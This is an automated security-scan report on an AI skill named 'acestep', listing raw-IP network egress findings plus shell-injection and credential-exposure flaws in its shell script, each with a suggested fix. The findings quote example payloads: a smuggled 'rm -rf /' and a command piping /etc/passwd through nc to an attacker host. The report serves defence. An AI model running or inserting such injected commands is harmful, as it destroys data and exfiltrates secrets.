Trust Assessment
acestep received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 11 findings: 10 critical, 1 high, 0 medium, and 0 low severity. Key findings include Network egress to untrusted endpoints, Shell Command Injection in `set_config` via unescaped `jq` argument, Shell Command Injection via unvalidated `api_url` in `curl` calls.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings11
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:80 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:101 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:137 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:235 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:251 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/scripts/acestep.sh:29 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/scripts/acestep.sh:73 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/scripts/config.json:2 | |
| CRITICAL | Shell Command Injection in `set_config` via unescaped `jq` argument The `set_config` function in `scripts/acestep.sh` constructs a `jq` command string by directly interpolating the `$value` variable without proper shell or JSON escaping. An attacker can inject arbitrary shell commands by providing a malicious string to the `config --set` command (e.g., `acestep.sh config --set api_url "http://example.com\"; rm -rf /; echo \""`), which will be executed by the shell before `jq` processes it. This allows for arbitrary code execution on the host system. Use `jq --arg` or `jq --argjson` to pass values safely, preventing shell interpretation and ensuring proper JSON escaping. For example, `jq --arg key "$key" --arg value "$value" '.[$key] = $value'` for string values. | LLM | scripts/acestep.sh:130 | |
| CRITICAL | Shell Command Injection via unvalidated `api_url` in `curl` calls The `api_url` variable, which can be set by user input via the `config --set api_url` command (and is vulnerable to injection itself), is directly interpolated into `curl` commands (e.g., in `check_health`, `cmd_health`, `cmd_generate`, `cmd_status`, `cmd_models`). If an attacker sets `api_url` to a string containing shell metacharacters (e.g., `http://example.com/health; rm -rf /`), these commands will be executed when the `curl` command is invoked. The `ensure_connection` function's health check does not sanitize the URL for shell injection. Sanitize the `api_url` to ensure it contains only valid URL characters before using it in shell commands. Alternatively, use `curl`'s `--url` option (e.g., `curl --url "$url/health"`) which treats the argument as a literal URL and prevents shell interpretation of its contents. | LLM | scripts/acestep.sh:160 | |
| HIGH | Potential Credential Exposure/Exfiltration via unescaped `api_key` in `Authorization` header The `api_key` is loaded from `config.json` and directly interpolated into the `Authorization` header string within the `build_auth_header` function: `-H "Authorization: Bearer ${api_key}"`. If an attacker can set a malicious `api_key` (e.g., via the `set_config` command injection) containing shell metacharacters like `"; cat /etc/passwd | nc attacker.com 80; echo "`, it could lead to the execution of arbitrary commands and exfiltration of sensitive data, including the API key itself or other system files. Ensure that `api_key` values are properly sanitized or escaped before being interpolated into shell command strings. The safest approach is to use `curl`'s `-H` option with a literal string and ensure the `api_key` itself is validated to prevent shell metacharacters. | LLM | scripts/acestep.sh:150 |
Scan History
Embed Code
[](https://skillshield.io/report/25385cd0d6dc0b00)
Powered by SkillShield